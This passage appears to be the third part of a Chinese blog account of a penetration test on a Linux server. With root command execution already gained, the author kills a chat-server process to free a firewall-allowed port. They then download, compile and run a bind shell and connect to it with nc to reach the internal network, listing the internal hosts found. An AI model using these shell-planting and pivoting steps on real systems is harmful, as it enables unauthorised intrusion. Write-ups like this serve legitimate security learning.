我们发现我们指定的命令被执行了!而且是以root身份执行的。这意味着我们已经完全控制了整个系统。
当然,通过cgi执行命令还是不如有一个shell来得方便。当然最简单的方法就是开一个xterm连回到我们的Xwindows即可。但是我们是用的 NAT,连不进来。听说工程部有个IP是可以外部访问的,就搬了笔记本过去准备用,结果在一切都准备好之后,发现对方居然关机了!@#^*#%#%#$%
第二天,我决定还是用老办法,开个shell算了。首先要找到一个可以外部访问的端口。但是防火墙并不允许外部访问所有的端口,经过一番测试,发现所有允许访问的端口都被占用着。仔细看了看进程,发现chatserver占了4个端口,每一个端口对应一个聊天室,而且目前也没有人在使用这些聊天室。所以我就先kill掉其中一个进程,这样就可以将在其对应的端口上绑定一个shell了。
通过jsp执行命令来下载/编译/运行我们的bindshell:
wget
gcc -o bindshell bindshell.c
nohup ./bindshell
现在就可以连接我们的shell了:nc yyy.yyy.yyy 9100
现在我们已经在防火墙的后面了,因此可以直接访问内网了。通过扫描发现存在如下内部主机:
172.16.1.1 Cisco PIX
172.16.1.2 mail
172.16.1.3 web
172.16.1.4 Oracle db
进一步测试还可以入侵其中的oracle服务器。至此,此次渗透测试基本结束。
对Linux服务器的一次渗透测试过程参考(3)
内容版权声明:除非注明,否则皆为本站原创文章。